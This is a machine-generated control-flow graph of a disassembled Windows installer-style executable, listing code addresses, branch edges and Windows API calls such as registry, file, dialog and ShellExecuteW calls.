3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 
3651->3473 4023 406009 lstrcpynW 3652->4023 3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 
3709->3529 3710->3709 3712 40139d 80 API calls 3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 
3776->3775 3777->3565 3779 407332 3778->3779 3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 
3837->3849 3850 401897 3837->3850 3851 4018db 3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 
4062a3 11 API calls 3904->3910 3914 4062a3 11 API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 
3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 
4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4938 402a84 4939 401553 19 API calls 4938->4939 4940 402a8e 4939->4940 4941 401446 18 API calls 4940->4941 4942 402a98 4941->4942 4943 401a13 4942->4943 4944 402ab2 RegEnumKeyW 4942->4944 4945 402abe RegEnumValueW 4942->4945 4946 402a7e 4944->4946 4945->4943 4945->4946 4946->4943 4947 4029e4 RegCloseKey 4946->4947 4947->4943 4948 402c8a 4949 402ca2 4948->4949 4950 402c8f 4948->4950 4952 40145c 18 API calls 4949->4952 4951 401446 18 API calls 4950->4951 4954 402c97 4951->4954 4953 402ca9 lstrlenW 4952->4953 4953->4954 4955 402ccb WriteFile 4954->4955 4956 401a13 4954->4956 4955->4956 4957 40400d 4958 40406a 4957->4958 4959 40401a lstrcpynA lstrlenA 4957->4959 4959->4958 4960 40404b 4959->4960 4960->4958 4961 404057 GlobalFree 4960->4961 4961->4958 4962 401d8e 4963 40145c 18 API calls 4962->4963 4964 401d95 ExpandEnvironmentStringsW 4963->4964 4965 401da8 4964->4965 4967 401db9 4964->4967 4966 401dad lstrcmpW 4965->4966 4965->4967 4966->4967 4968 401e0f 4969 401446 18 API calls 4968->4969 4970 401e17 4969->4970 4971 401446 18 API calls 4970->4971 4972 401e21 4971->4972 4973 4030e3 4972->4973 4975 405f51 wsprintfW 4972->4975 4975->4973 4976 402392 4977 40145c 18 API calls 4976->4977 4978 402399 4977->4978 4981 4071f8 4978->4981 4982 406ed2 25 API calls 
4981->4982 4983 407218 4982->4983 4984 407222 lstrcpynW lstrcmpW 4983->4984 4985 4023a7 4983->4985 4986 407254 4984->4986 4987 40725a lstrcpynW 4984->4987 4986->4987 4987->4985 4061 402713 4076 406009 lstrcpynW 4061->4076 4063 40272c 4077 406009 lstrcpynW 4063->4077 4065 402738 4066 40145c 18 API calls 4065->4066 4068 402743 4065->4068 4066->4068 4067 402752 4070 40145c 18 API calls 4067->4070 4072 402761 4067->4072 4068->4067 4069 40145c 18 API calls 4068->4069 4069->4067 4070->4072 4071 40145c 18 API calls 4073 40276b 4071->4073 4072->4071 4074 4062a3 11 API calls 4073->4074 4075 40277f WritePrivateProfileStringW 4074->4075 4076->4063 4077->4065 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4132 401a1f 4133 40145c 18 API calls 4132->4133 4134 401a26 4133->4134 4135 4062a3 11 API calls 4134->4135 4136 401a49 4135->4136 4137 401a64 4136->4137 4138 401a5c 4136->4138 4186 406009 lstrcpynW 4137->4186 4185 406009 lstrcpynW 4138->4185 4141 401a62 4145 406038 5 API calls 4141->4145 4142 401a6f 4143 406722 3 API calls 4142->4143 4144 401a75 lstrcatW 4143->4144 4144->4141 4147 401a81 4145->4147 4146 4062d5 2 API calls 4146->4147 4147->4146 4148 405e30 2 API calls 4147->4148 4150 401a98 CompareFileTime 4147->4150 4151 401ba9 4147->4151 4155 4062a3 11 API calls 4147->4155 4159 406009 lstrcpynW 4147->4159 4165 406805 18 API calls 4147->4165 4172 405ca0 MessageBoxIndirectW 4147->4172 4176 401b50 4147->4176 4183 401b5d 4147->4183 4184 405e50 
GetFileAttributesW CreateFileW 4147->4184 4148->4147 4150->4147 4152 404f72 25 API calls 4151->4152 4154 401bb3 4152->4154 4153 404f72 25 API calls 4156 401b70 4153->4156 4157 40337f 37 API calls 4154->4157 4155->4147 4160 4062a3 11 API calls 4156->4160 4158 401bc6 4157->4158 4161 4062a3 11 API calls 4158->4161 4159->4147 4167 401b8b 4160->4167 4162 401bda 4161->4162 4163 401be9 SetFileTime 4162->4163 4164 401bf8 FindCloseChangeNotification 4162->4164 4163->4164 4166 401c09 4164->4166 4164->4167 4165->4147 4168 401c21 4166->4168 4169 401c0e 4166->4169 4171 406805 18 API calls 4168->4171 4170 406805 18 API calls 4169->4170 4173 401c16 lstrcatW 4170->4173 4174 401c29 4171->4174 4172->4147 4173->4174 4175 4062a3 11 API calls 4174->4175 4177 401c34 4175->4177 4178 401b93 4176->4178 4179 401b53 4176->4179 4180 405ca0 MessageBoxIndirectW 4177->4180 4181 4062a3 11 API calls 4178->4181 4182 4062a3 11 API calls 4179->4182 4180->4167 4181->4167 4182->4183 4183->4153 4184->4147 4185->4141 4186->4142 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 
5037->5038 5038->5036 5040 4044a5 5041 404512 5040->5041 5042 4044df 5040->5042 5044 40451f GetDlgItem GetAsyncKeyState 5041->5044 5051 4045b1 5041->5051 5108 405c84 GetDlgItemTextW 5042->5108 5047 40453e GetDlgItem 5044->5047 5054 40455c 5044->5054 5045 4044ea 5048 406038 5 API calls 5045->5048 5046 40469d 5106 404833 5046->5106 5110 405c84 GetDlgItemTextW 5046->5110 5049 403d3f 19 API calls 5047->5049 5050 4044f0 5048->5050 5053 404551 ShowWindow 5049->5053 5056 403e74 5 API calls 5050->5056 5051->5046 5057 406805 18 API calls 5051->5057 5051->5106 5053->5054 5059 404579 SetWindowTextW 5054->5059 5064 405d59 4 API calls 5054->5064 5055 403dca 8 API calls 5060 404847 5055->5060 5061 4044f5 GetDlgItem 5056->5061 5062 40462f SHBrowseForFolderW 5057->5062 5058 4046c9 5063 40677e 18 API calls 5058->5063 5065 403d3f 19 API calls 5059->5065 5066 404503 IsDlgButtonChecked 5061->5066 5061->5106 5062->5046 5067 404647 CoTaskMemFree 5062->5067 5068 4046cf 5063->5068 5069 40456f 5064->5069 5070 404597 5065->5070 5066->5041 5071 406722 3 API calls 5067->5071 5111 406009 lstrcpynW 5068->5111 5069->5059 5075 406722 3 API calls 5069->5075 5072 403d3f 19 API calls 5070->5072 5073 404654 5071->5073 5076 4045a2 5072->5076 5077 40468b SetDlgItemTextW 5073->5077 5082 406805 18 API calls 5073->5082 5075->5059 5109 403d98 SendMessageW 5076->5109 5077->5046 5078 4046e6 5080 4062fc 3 API calls 5078->5080 5089 4046ee 5080->5089 5081 4045aa 5085 4062fc 3 API calls 5081->5085 5083 404673 lstrcmpiW 5082->5083 5083->5077 5086 404684 lstrcatW 5083->5086 5084 404730 5112 406009 lstrcpynW 5084->5112 5085->5051 5086->5077 5088 404739 5090 405d59 4 API calls 5088->5090 5089->5084 5094 406751 2 API calls 5089->5094 5095 404785 5089->5095 5091 40473f GetDiskFreeSpaceW 5090->5091 5093 404763 MulDiv 5091->5093 5091->5095 5093->5095 5094->5089 5097 4047e2 5095->5097 5098 4043ad 21 API calls 5095->5098 5096 404805 5113 403d85 EnableWindow 5096->5113 5097->5096 5099 40141d 80 API calls 5097->5099 5100 
4047d3 5098->5100 5099->5096 5102 4047e4 SetDlgItemTextW 5100->5102 5103 4047d8 5100->5103 5102->5097 5104 4043ad 21 API calls 5103->5104 5104->5097 5105 404821 5105->5106 5114 403d61 5105->5114 5106->5055 5108->5045 5109->5081 5110->5058 5111->5078 5112->5088 5113->5105 5115 403d74 SendMessageW 5114->5115 5116 403d6f 5114->5116 5115->5106 5116->5115 5117 402da5 5118 4030e3 5117->5118 5119 402dac 5117->5119 5120 401446 18 API calls 5119->5120 5121 402db8 5120->5121 5122 402dbf SetFilePointer 5121->5122 5122->5118 5123 402dcf 5122->5123 5123->5118 5125 405f51 wsprintfW 5123->5125 5125->5118 5126 4030a9 SendMessageW 5127 4030c2 InvalidateRect 5126->5127 5128 4030e3 5126->5128 5127->5128 5129 401cb2 5130 40145c 18 API calls 5129->5130 5131 401c54 5130->5131 5132 4062a3 11 API calls 5131->5132 5135 401c64 5131->5135 5133 401c59 5132->5133 5134 406c9b 81 API calls 5133->5134 5134->5135 4078 4021b5 4079 40145c 18 API calls 4078->4079 4080 4021bb 4079->4080 4081 40145c 18 API calls 4080->4081 4082 4021c4 4081->4082 4083 40145c 18 API calls 4082->4083 4084 4021cd 4083->4084 4085 40145c 18 API calls 4084->4085 4086 4021d6 4085->4086 4087 404f72 25 API calls 4086->4087 4088 4021e2 ShellExecuteW 4087->4088 4089 40221b 4088->4089 4090 40220d 4088->4090 4092 4062a3 11 API calls 4089->4092 4091 4062a3 11 API calls 4090->4091 4091->4089 4093 402230 4092->4093 5143 402238 5144 40145c 18 API calls 5143->5144 5145 40223e 5144->5145 5146 4062a3 11 API calls 5145->5146 5147 40224b 5146->5147 5148 404f72 25 API calls 5147->5148 5149 402255 5148->5149 5150 405c3f 2 API calls 5149->5150 5151 40225b 5150->5151 5152 4062a3 11 API calls 5151->5152 5155 4022ac CloseHandle 5151->5155 5158 40226d 5152->5158 5154 4030e3 5155->5154 5156 402283 WaitForSingleObject 5157 402291 GetExitCodeProcess 5156->5157 5156->5158 5157->5155 5160 4022a3 5157->5160 5158->5155 5158->5156 5159 406332 2 API calls 5158->5159 5159->5156 5162 405f51 wsprintfW 5160->5162 5162->5155 5163 4040b8 5164 4040d3 5163->5164 
5172 404201 5163->5172 5168 40410e 5164->5168 5194 403fca WideCharToMultiByte 5164->5194 5165 40426c 5166 404276 GetDlgItem 5165->5166 5167 40433e 5165->5167 5169 404290 5166->5169 5170 4042ff 5166->5170 5173 403dca 8 API calls 5167->5173 5175 403d3f 19 API calls 5168->5175 5169->5170 5178 4042b6 6 API calls 5169->5178 5170->5167 5179 404311 5170->5179 5172->5165 5172->5167 5174 40423b GetDlgItem SendMessageW 5172->5174 5177 404339 5173->5177 5199 403d85 EnableWindow 5174->5199 5176 40414e 5175->5176 5181 403d3f 19 API calls 5176->5181 5178->5170 5182 404327 5179->5182 5183 404317 SendMessageW 5179->5183 5186 40415b CheckDlgButton 5181->5186 5182->5177 5187 40432d SendMessageW 5182->5187 5183->5182 5184 404267 5185 403d61 SendMessageW 5184->5185 5185->5165 5197 403d85 EnableWindow 5186->5197 5187->5177 5189 404179 GetDlgItem 5198 403d98 SendMessageW 5189->5198 5191 40418f SendMessageW 5192 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5191->5192 5193 4041ac GetSysColor 5191->5193 5192->5177 5193->5192 5195 404007 5194->5195 5196 403fe9 GlobalAlloc WideCharToMultiByte 5194->5196 5195->5168 5196->5195 5197->5189 5198->5191 5199->5184 4094 401eb9 4095 401f24 4094->4095 4096 401ec6 4094->4096 4097 401f53 GlobalAlloc 4095->4097 4098 401f28 4095->4098 4099 401ed5 4096->4099 4106 401ef7 4096->4106 4100 406805 18 API calls 4097->4100 4105 4062a3 11 API calls 4098->4105 4110 401f36 4098->4110 4101 4062a3 11 API calls 4099->4101 4104 401f46 4100->4104 4102 401ee2 4101->4102 4107 402708 4102->4107 4112 406805 18 API calls 4102->4112 4104->4107 4108 402387 GlobalFree 4104->4108 4105->4110 4116 406009 lstrcpynW 4106->4116 4108->4107 4118 406009 lstrcpynW 4110->4118 4111 401f06 4117 406009 lstrcpynW 4111->4117 4112->4102 4114 401f15 4119 406009 lstrcpynW 4114->4119 4116->4111 4117->4114 4118->4104 4119->4107 5200 4074bb 5202 407344 5200->5202 5201 407c6d 5202->5201 5203 4073c2 GlobalFree 5202->5203 5204 4073cb GlobalAlloc 5202->5204 5205 407443 GlobalAlloc 
5202->5205 5206 40743a GlobalFree 5202->5206 5203->5204 5204->5201 5204->5202 5205->5201 5205->5202 5206->5205

Control-flow Graph
